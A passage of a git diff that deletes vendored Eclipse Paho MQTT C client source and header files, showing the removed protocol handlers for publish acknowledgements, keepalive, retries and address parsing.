-		p.topic = (*mm)->publish->topic;
-	}
-	rc = MQTTProtocol_startPublishCommon(pubclient, &p, qos, retained);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Copy and store message data for retries
- * @param publish the publication data
- * @param mm - pointer to the message data to store
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @return pointer to the message data stored
- */
-Messages* MQTTProtocol_createMessage(Publish* publish, Messages **mm, int qos, int retained)
-{
-	Messages* m = malloc(sizeof(Messages));
-
-	FUNC_ENTRY;
-	m->len = sizeof(Messages);
-	if (*mm == NULL || (*mm)->publish == NULL)
-	{
-		int len1;
-		*mm = m;
-		m->publish = MQTTProtocol_storePublication(publish, &len1);
-		m->len += len1;
-	}
-	else
-	{
-		++(((*mm)->publish)->refcount);
-		m->publish = (*mm)->publish;
-	}
-	m->msgid = publish->msgId;
-	m->qos = qos;
-	m->retain = retained;
-	time(&(m->lastTouch));
-	if (qos == 2)
-		m->nextMessageType = PUBREC;
-	FUNC_EXIT;
-	return m;
-}
-
-
-/**
- * Store message data for possible retry
- * @param publish the publication data
- * @param len returned length of the data stored
- * @return the publication stored
- */
-Publications* MQTTProtocol_storePublication(Publish* publish, int* len)
-{
-	Publications* p = malloc(sizeof(Publications));
-
-	FUNC_ENTRY;
-	p->refcount = 1;
-
-	*len = (int)strlen(publish->topic)+1;
-	if (Heap_findItem(publish->topic))
-		p->topic = publish->topic;
-	else
-	{
-		p->topic = malloc(*len);
-		strcpy(p->topic, publish->topic);
-	}
-	*len += sizeof(Publications);
-
-	p->topiclen = publish->topiclen;
-	p->payloadlen = publish->payloadlen;
-	p->payload = malloc(publish->payloadlen);
-	memcpy(p->payload, publish->payload, p->payloadlen);
-	*len += publish->payloadlen;
-
-	ListAppend(&(state.publications), p, *len);
-	FUNC_EXIT;
-	return p;
-}
-
-/**
- * Remove stored message data.  Opposite of storePublication
- * @param p stored publication to remove
- */
-void MQTTProtocol_removePublication(Publications* p)
-{
-	FUNC_ENTRY;
-	if (--(p->refcount) == 0)
-	{
-		free(p->payload);
-		free(p->topic);
-		ListRemove(&(state.publications), p);
-	}
-	FUNC_EXIT;
-}
-
-/**
- * Process an incoming publish packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePublishes(void* pack, int sock)
-{
-	Publish* publish = (Publish*)pack;
-	Clients* client = NULL;
-	char* clientid = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	clientid = client->clientID;
-	Log(LOG_PROTOCOL, 11, NULL, sock, clientid, publish->msgId, publish->header.bits.qos,
-					publish->header.bits.retain, min(20, publish->payloadlen), publish->payload);
-
-	if (publish->header.bits.qos == 0)
-		Protocol_processPublication(publish, client);
-	else if (publish->header.bits.qos == 1)
-	{
-		/* send puback before processing the publications because a lot of return publications could fill up the socket buffer */
-		rc = MQTTPacket_send_puback(publish->msgId, &client->net, client->clientID);
-		/* if we get a socket error from sending the puback, should we ignore the publication? */
-		Protocol_processPublication(publish, client);
-	}
-	else if (publish->header.bits.qos == 2)
-	{
-		/* store publication in inbound list */
-		int len;
-		ListElement* listElem = NULL;
-		Messages* m = malloc(sizeof(Messages));
-		Publications* p = MQTTProtocol_storePublication(publish, &len);
-		m->publish = p;
-		m->msgid = publish->msgId;
-		m->qos = publish->header.bits.qos;
-		m->retain = publish->header.bits.retain;
-		m->nextMessageType = PUBREL;
-		if ( ( listElem = ListFindItem(client->inboundMsgs, &(m->msgid), messageIDCompare) ) != NULL )
-		{   /* discard queued publication with same msgID that the current incoming message */
-			Messages* msg = (Messages*)(listElem->content);
-			MQTTProtocol_removePublication(msg->publish);
-			ListInsert(client->inboundMsgs, m, sizeof(Messages) + len, listElem);
-			ListRemove(client->inboundMsgs, msg);
-		} else
-			ListAppend(client->inboundMsgs, m, sizeof(Messages) + len);
-		rc = MQTTPacket_send_pubrec(publish->msgId, &client->net, client->clientID);
-		publish->topic = NULL;
-	}
-	MQTTPacket_freePublish(publish);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Process an incoming puback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubacks(void* pack, int sock)
-{
-	Puback* puback = (Puback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 14, NULL, sock, client->clientID, puback->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	if (ListFindItem(client->outboundMsgs, &(puback->msgId), messageIDCompare) == NULL)
-		Log(TRACE_MIN, 3, NULL, "PUBACK", client->clientID, puback->msgId);
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 1)
-			Log(TRACE_MIN, 4, NULL, "PUBACK", client->clientID, puback->msgId, m->qos);
-		else
-		{
-			Log(TRACE_MIN, 6, NULL, "PUBACK", client->clientID, puback->msgId);
-			#if !defined(NO_PERSISTENCE)
-				rc = MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_SENT, m->qos, puback->msgId);
-			#endif
-			MQTTProtocol_removePublication(m->publish);
-			ListRemove(client->outboundMsgs, m);
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubrec packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubrecs(void* pack, int sock)
-{
-	Pubrec* pubrec = (Pubrec*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 15, NULL, sock, client->clientID, pubrec->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	client->outboundMsgs->current = NULL;
-	if (ListFindItem(client->outboundMsgs, &(pubrec->msgId), messageIDCompare) == NULL)
-	{
-		if (pubrec->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBREC", client->clientID, pubrec->msgId);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 2)
-		{
-			if (pubrec->header.bits.dup == 0)
-				Log(TRACE_MIN, 4, NULL, "PUBREC", client->clientID, pubrec->msgId, m->qos);
-		}
-		else if (m->nextMessageType != PUBREC)
-		{
-			if (pubrec->header.bits.dup == 0)
-				Log(TRACE_MIN, 5, NULL, "PUBREC", client->clientID, pubrec->msgId);
-		}
-		else
-		{
-			rc = MQTTPacket_send_pubrel(pubrec->msgId, 0, &client->net, client->clientID);
-			m->nextMessageType = PUBCOMP;
-			time(&(m->lastTouch));
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubrel packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubrels(void* pack, int sock)
-{
-	Pubrel* pubrel = (Pubrel*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 17, NULL, sock, client->clientID, pubrel->msgId);
-
-	/* look for the message by message id in the records of inbound messages for this client */
-	if (ListFindItem(client->inboundMsgs, &(pubrel->msgId), messageIDCompare) == NULL)
-	{
-		if (pubrel->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBREL", client->clientID, pubrel->msgId);
-		else
-			/* Apparently this is "normal" behaviour, so we don't need to issue a warning */
-			rc = MQTTPacket_send_pubcomp(pubrel->msgId, &client->net, client->clientID);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->inboundMsgs->current->content);
-		if (m->qos != 2)
-			Log(TRACE_MIN, 4, NULL, "PUBREL", client->clientID, pubrel->msgId, m->qos);
-		else if (m->nextMessageType != PUBREL)
-			Log(TRACE_MIN, 5, NULL, "PUBREL", client->clientID, pubrel->msgId);
-		else
-		{
-			Publish publish;
-
-			/* send pubcomp before processing the publications because a lot of return publications could fill up the socket buffer */
-			rc = MQTTPacket_send_pubcomp(pubrel->msgId, &client->net, client->clientID);
-			publish.header.bits.qos = m->qos;
-			publish.header.bits.retain = m->retain;
-			publish.msgId = m->msgid;
-			publish.topic = m->publish->topic;
-			publish.topiclen = m->publish->topiclen;
-			publish.payload = m->publish->payload;
-			publish.payloadlen = m->publish->payloadlen;
-			Protocol_processPublication(&publish, client);
-			#if !defined(NO_PERSISTENCE)
-				rc += MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_RECEIVED, m->qos, pubrel->msgId);
-			#endif
-			ListRemove(&(state.publications), m->publish);
-			ListRemove(client->inboundMsgs, m);
-			++(state.msgs_received);
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubcomp packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubcomps(void* pack, int sock)
-{
-	Pubcomp* pubcomp = (Pubcomp*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 19, NULL, sock, client->clientID, pubcomp->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	if (ListFindItem(client->outboundMsgs, &(pubcomp->msgId), messageIDCompare) == NULL)
-	{
-		if (pubcomp->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 2)
-			Log(TRACE_MIN, 4, NULL, "PUBCOMP", client->clientID, pubcomp->msgId, m->qos);
-		else
-		{
-			if (m->nextMessageType != PUBCOMP)
-				Log(TRACE_MIN, 5, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-			else
-			{
-				Log(TRACE_MIN, 6, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-				#if !defined(NO_PERSISTENCE)
-					rc = MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_SENT, m->qos, pubcomp->msgId);
-				#endif
-				MQTTProtocol_removePublication(m->publish);
-				ListRemove(client->outboundMsgs, m);
-				(++state.msgs_sent);
-			}
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT protocol keepAlive processing.  Sends PINGREQ packets as required.
- * @param now current time
- */
-void MQTTProtocol_keepalive(time_t now)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	ListNextElement(bstate->clients, &current);
-	while (current)
-	{
-		Clients* client =	(Clients*)(current->content);
-		ListNextElement(bstate->clients, &current); 
-		if (client->connected && client->keepAliveInterval > 0 &&
-			(difftime(now, client->net.lastSent) >= client->keepAliveInterval ||
-					difftime(now, client->net.lastReceived) >= client->keepAliveInterval))
-		{
-			if (client->ping_outstanding == 0)
-			{
-				if (Socket_noPendingWrites(client->net.socket))
-				{
-					if (MQTTPacket_send_pingreq(&client->net, client->clientID) != TCPSOCKET_COMPLETE)
-					{
-						Log(TRACE_PROTOCOL, -1, "Error sending PINGREQ for client %s on socket %d, disconnecting", client->clientID, client->net.socket);
-						MQTTProtocol_closeSession(client, 1);
-					}
-					else
-					{
-						client->net.lastSent = now;
-						client->ping_outstanding = 1;
-					}
-				}
-			}
-			else
-			{
-				Log(TRACE_PROTOCOL, -1, "PINGRESP not received in keepalive interval for client %s on socket %d, disconnecting", client->clientID, client->net.socket);
-				MQTTProtocol_closeSession(client, 1);
-			}
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * MQTT retry processing per client
- * @param now current time
- * @param client - the client to which to apply the retry processing
- * @param regardless boolean - retry packets regardless of retry interval (used on reconnect)
- */
-static void MQTTProtocol_retries(time_t now, Clients* client, int regardless)
-{
-	ListElement* outcurrent = NULL;
-
-	FUNC_ENTRY;
-
-	if (!regardless && client->retryInterval <= 0) /* 0 or -ive retryInterval turns off retry except on reconnect */
-		goto exit;
-
-	while (client && ListNextElement(client->outboundMsgs, &outcurrent) &&
-		   client->connected && client->good &&        /* client is connected and has no errors */
-		   Socket_noPendingWrites(client->net.socket)) /* there aren't any previous packets still stacked up on the socket */
-	{
-		Messages* m = (Messages*)(outcurrent->content);
-		if (regardless || difftime(now, m->lastTouch) > max(client->retryInterval, 10))
-		{
-			if (m->qos == 1 || (m->qos == 2 && m->nextMessageType == PUBREC))
-			{
-				Publish publish;
-				int rc;
-
-				Log(TRACE_MIN, 7, NULL, "PUBLISH", client->clientID, client->net.socket, m->msgid);
-				publish.msgId = m->msgid;
-				publish.topic = m->publish->topic;
-				publish.payload = m->publish->payload;
-				publish.payloadlen = m->publish->payloadlen;
-				rc = MQTTPacket_send_publish(&publish, 1, m->qos, m->retain, &client->net, client->clientID);
-				if (rc == SOCKET_ERROR)
-				{
-					client->good = 0;
-					Log(TRACE_PROTOCOL, 29, NULL, client->clientID, client->net.socket,
-												Socket_getpeer(client->net.socket));
-					MQTTProtocol_closeSession(client, 1);
-					client = NULL;
-				}
-				else
-				{
-					if (m->qos == 0 && rc == TCPSOCKET_INTERRUPTED)
-						MQTTProtocol_storeQoS0(client, &publish);
-					time(&(m->lastTouch));
-				}
-			}
-			else if (m->qos && m->nextMessageType == PUBCOMP)
-			{
-				Log(TRACE_MIN, 7, NULL, "PUBREL", client->clientID, client->net.socket, m->msgid);
-				if (MQTTPacket_send_pubrel(m->msgid, 0, &client->net, client->clientID) != TCPSOCKET_COMPLETE)
-				{
-					client->good = 0;
-					Log(TRACE_PROTOCOL, 29, NULL, client->clientID, client->net.socket,
-							Socket_getpeer(client->net.socket));
-					MQTTProtocol_closeSession(client, 1);
-					client = NULL;
-				}
-				else
-					time(&(m->lastTouch));
-			}
-			/* break; why not do all retries at once? */
-		}
-	}
-exit:
-	FUNC_EXIT;
-}
-
-
-/**
- * MQTT retry protocol and socket pending writes processing.
- * @param now current time
- * @param doRetry boolean - retries as well as pending writes?
- * @param regardless boolean - retry packets regardless of retry interval (used on reconnect)
- */
-void MQTTProtocol_retry(time_t now, int doRetry, int regardless)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	ListNextElement(bstate->clients, &current);
-	/* look through the outbound message list of each client, checking to see if a retry is necessary */
-	while (current)
-	{
-		Clients* client = (Clients*)(current->content);
-		ListNextElement(bstate->clients, &current);
-		if (client->connected == 0)
-			continue;
-		if (client->good == 0)
-		{
-			MQTTProtocol_closeSession(client, 1);
-			continue;
-		}
-		if (Socket_noPendingWrites(client->net.socket) == 0)
-			continue;
-		if (doRetry)
-			MQTTProtocol_retries(now, client, regardless);
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * Free a client structure
- * @param client the client data to free
- */
-void MQTTProtocol_freeClient(Clients* client)
-{
-	FUNC_ENTRY;
-	/* free up pending message lists here, and any other allocated data */
-	MQTTProtocol_freeMessageList(client->outboundMsgs);
-	MQTTProtocol_freeMessageList(client->inboundMsgs);
-	ListFree(client->messageQueue);
-	free(client->clientID);
-	if (client->will)
-	{
-		free(client->will->payload);
-		free(client->will->topic);
-		free(client->will);
-	}
-#if defined(OPENSSL)
-	if (client->sslopts)
-	{
-		if (client->sslopts->trustStore)
-			free((void*)client->sslopts->trustStore);
-		if (client->sslopts->keyStore)
-			free((void*)client->sslopts->keyStore);
-		if (client->sslopts->privateKey)
-			free((void*)client->sslopts->privateKey);
-		if (client->sslopts->privateKeyPassword)
-			free((void*)client->sslopts->privateKeyPassword);
-		if (client->sslopts->enabledCipherSuites)
-			free((void*)client->sslopts->enabledCipherSuites);
-		free(client->sslopts);
-	}
-#endif
-	/* don't free the client structure itself... this is done elsewhere */
-	FUNC_EXIT;
-}
-
-
-/**
- * Empty a message list, leaving it able to accept new messages
- * @param msgList the message list to empty
- */
-void MQTTProtocol_emptyMessageList(List* msgList)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(msgList, &current))
-	{
-		Messages* m = (Messages*)(current->content);
-		MQTTProtocol_removePublication(m->publish);
-	}
-	ListEmpty(msgList);
-	FUNC_EXIT;
-}
-
-
-/**
- * Empty and free up all storage used by a message list
- * @param msgList the message list to empty and free
- */
-void MQTTProtocol_freeMessageList(List* msgList)
-{
-	FUNC_ENTRY;
-	MQTTProtocol_emptyMessageList(msgList);
-	ListFree(msgList);
-	FUNC_EXIT;
-}
-
-
-/**
-* Copy no more than dest_size -1 characters from the string pointed to by src to the array pointed to by dest.
-* The destination string will always be null-terminated.
-* @param dest the array which characters copy to
-* @param src the source string which characters copy from
-* @param dest_size the size of the memory pointed to by dest: copy no more than this -1 (allow for null).  Must be >= 1
-* @return the destination string pointer
-*/
-char* MQTTStrncpy(char *dest, const char *src, size_t dest_size)
-{
-  size_t count = dest_size;
-  char *temp = dest;
-
-  FUNC_ENTRY; 
-  if (dest_size < strlen(src))
-    Log(TRACE_MIN, -1, "the src string is truncated");
-
-  /* We must copy only the first (dest_size - 1) bytes */
-  while (count > 1 && (*temp++ = *src++))
-    count--;
-
-  *temp = '\0';
-
-  FUNC_EXIT;
-  return dest;
-}
-
-
-/**
-* Duplicate a string, safely, allocating space on the heap
-* @param src the source string which characters copy from
-* @return the duplicated, allocated string
-*/
-char* MQTTStrdup(const char* src)
-{
-	size_t mlen = strlen(src) + 1;
-	char* temp = malloc(mlen);
-	MQTTStrncpy(temp, src, mlen);
-	return temp;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h b/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h
deleted file mode 100644
index 36c2dd2..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 updates
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOLCLIENT_H)
-#define MQTTPROTOCOLCLIENT_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Log.h"
-#include "MQTTProtocol.h"
-#include "Messages.h"
-
-#define MAX_MSG_ID 65535
-#define MAX_CLIENTID_LEN 65535
-
-int MQTTProtocol_startPublish(Clients* pubclient, Publish* publish, int qos, int retained, Messages** m);
-Messages* MQTTProtocol_createMessage(Publish* publish, Messages** mm, int qos, int retained);
-Publications* MQTTProtocol_storePublication(Publish* publish, int* len);
-int messageIDCompare(void* a, void* b);
-int MQTTProtocol_assignMsgId(Clients* client);
-void MQTTProtocol_removePublication(Publications* p);
-void Protocol_processPublication(Publish* publish, Clients* client);
-
-int MQTTProtocol_handlePublishes(void* pack, int sock);
-int MQTTProtocol_handlePubacks(void* pack, int sock);
-int MQTTProtocol_handlePubrecs(void* pack, int sock);
-int MQTTProtocol_handlePubrels(void* pack, int sock);
-int MQTTProtocol_handlePubcomps(void* pack, int sock);
-
-void MQTTProtocol_closeSession(Clients* c, int sendwill);
-void MQTTProtocol_keepalive(time_t);
-void MQTTProtocol_retry(time_t, int, int);
-void MQTTProtocol_freeClient(Clients* client);
-void MQTTProtocol_emptyMessageList(List* msgList);
-void MQTTProtocol_freeMessageList(List* msgList);
-
-char* MQTTStrncpy(char *dest, const char* src, size_t num);
-char* MQTTStrdup(const char* src);
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c b/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c
deleted file mode 100644
index 90d38bf..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c
+++ /dev/null
@@ -1,242 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for buffer overflow in addressPort bug #433290
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 479376
- *    Ian Craggs - SNI support
- *    Ian Craggs - fix for issue #164
- *    Ian Craggs - fix for issue #179
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions dealing with the MQTT protocol exchanges
- *
- * Some other related functions are in the MQTTProtocolClient module
- */
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "MQTTProtocolOut.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-extern ClientStates* bstate;
-
-
-
-/**
- * Separates an address:port into two separate values
- * @param uri the input string - hostname:port
- * @param port the returned port integer
- * @return the address string
- */
-char* MQTTProtocol_addressPort(const char* uri, int* port)
-{
-	char* colon_pos = strrchr(uri, ':'); /* reverse find to allow for ':' in IPv6 addresses */
-	char* buf = (char*)uri;
-	size_t len;
-
-	FUNC_ENTRY;
-	if (uri[0] == '[')
-	{  /* ip v6 */
-		if (colon_pos < strrchr(uri, ']'))
-			colon_pos = NULL;  /* means it was an IPv6 separator, not for host:port */
-	}
-
-	if (colon_pos) /* have to strip off the port */
-	{
-		size_t addr_len = colon_pos - uri;
-		buf = malloc(addr_len + 1);
-		*port = atoi(colon_pos + 1);
-		MQTTStrncpy(buf, uri, addr_len+1);
-	}
-	else
-		*port = DEFAULT_PORT;
-
-	len = strlen(buf);
-	if (buf[len - 1] == ']')
-	{
-		if (buf == (char*)uri)
-		{
-			buf = malloc(len);  /* we are stripping off the final ], so length is 1 shorter */
-			MQTTStrncpy(buf, uri, len);
-		}
-		else
-			buf[len - 1] = '\0';
-	}
-	FUNC_EXIT;
-	return buf;
-}
-
-
-/**
- * MQTT outgoing connect processing for a client
- * @param ip_address the TCP address:port to connect to
- * @param aClient a structure with all MQTT data needed
- * @param int ssl
- * @param int MQTTVersion the MQTT version to connect with (3 or 4)
- * @return return code
- */
-#if defined(OPENSSL)
-int MQTTProtocol_connect(const char* ip_address, Clients* aClient, int ssl, int MQTTVersion)
-#else
-int MQTTProtocol_connect(const char* ip_address, Clients* aClient, int MQTTVersion)
-#endif
-{
-	int rc, port;
-	char* addr;
-
-	FUNC_ENTRY;
-	aClient->good = 1;
-
-	addr = MQTTProtocol_addressPort(ip_address, &port);
-	rc = Socket_new(addr, port, &(aClient->net.socket));
-	if (rc == EINPROGRESS || rc == EWOULDBLOCK)
-		aClient->connect_state = 1; /* TCP connect called - wait for connect completion */
-	else if (rc == 0)
-	{	/* TCP connect completed. If SSL, send SSL connect */
-#if defined(OPENSSL)
-		if (ssl)
-		{
-			if (SSLSocket_setSocketForSSL(&aClient->net, aClient->sslopts, addr) == 1)
-			{
-				rc = SSLSocket_connect(aClient->net.ssl, aClient->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-					aClient->connect_state = 2; /* SSL connect called - wait for completion */
-			}
-			else
-				rc = SOCKET_ERROR;
-		}
-#endif
-		
-		if (rc == 0)
-		{
-			/* Now send the MQTT connect packet */
-			if ((rc = MQTTPacket_send_connect(aClient, MQTTVersion)) == 0)
-				aClient->connect_state = 3; /* MQTT Connect sent - wait for CONNACK */ 
-			else
-				aClient->connect_state = 0;
-		}
-	}
-	if (addr != ip_address)
-		free(addr);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pingresp packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePingresps(void* pack, int sock)
-{
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 21, NULL, sock, client->clientID);
-	client->ping_outstanding = 0;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT outgoing subscribe processing for a client
- * @param client the client structure
- * @param topics list of topics
- * @param qoss corresponding list of QoSs
- * @return completion code
- */
-int MQTTProtocol_subscribe(Clients* client, List* topics, List* qoss, int msgID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	/* we should stack this up for retry processing too */
-	rc = MQTTPacket_send_subscribe(topics, qoss, msgID, 0, &client->net, client->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming suback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handleSubacks(void* pack, int sock)
-{
-	Suback* suback = (Suback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 23, NULL, sock, client->clientID, suback->msgId);
-	MQTTPacket_freeSuback(suback);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT outgoing unsubscribe processing for a client
- * @param client the client structure
- * @param topics list of topics
- * @return completion code
- */
-int MQTTProtocol_unsubscribe(Clients* client, List* topics, int msgID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	/* we should stack this up for retry processing too? */
-	rc = MQTTPacket_send_unsubscribe(topics, msgID, 0, &client->net, client->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming unsuback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handleUnsubacks(void* pack, int sock)
-{
-	Unsuback* unsuback = (Unsuback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 24, NULL, sock, client->clientID, unsuback->msgId);
-	free(unsuback);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h b/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h
deleted file mode 100644
index 3b890e7..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - SNI support
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOLOUT_H)
-#define MQTTPROTOCOLOUT_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Clients.h"
-#include "Log.h"
-#include "Messages.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolClient.h"
-
-#define DEFAULT_PORT 1883
-
-char* MQTTProtocol_addressPort(const char* uri, int* port);
-void MQTTProtocol_reconnect(const char* ip_address, Clients* client);
-#if defined(OPENSSL)
-int MQTTProtocol_connect(const char* ip_address, Clients* acClients, int ssl, int MQTTVersion);
-#else
-int MQTTProtocol_connect(const char* ip_address, Clients* acClients, int MQTTVersion);
-#endif
-int MQTTProtocol_handlePingresps(void* pack, int sock);
-int MQTTProtocol_subscribe(Clients* client, List* topics, List* qoss, int msgID);
-int MQTTProtocol_handleSubacks(void* pack, int sock);
-int MQTTProtocol_unsubscribe(Clients* client, List* topics, int msgID);
-int MQTTProtocol_handleUnsubacks(void* pack, int sock);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTVersion.c b/thirdparty/paho.mqtt.c/src/MQTTVersion.c
deleted file mode 100644
index 382033a..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTVersion.c
+++ /dev/null
@@ -1,230 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2015 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
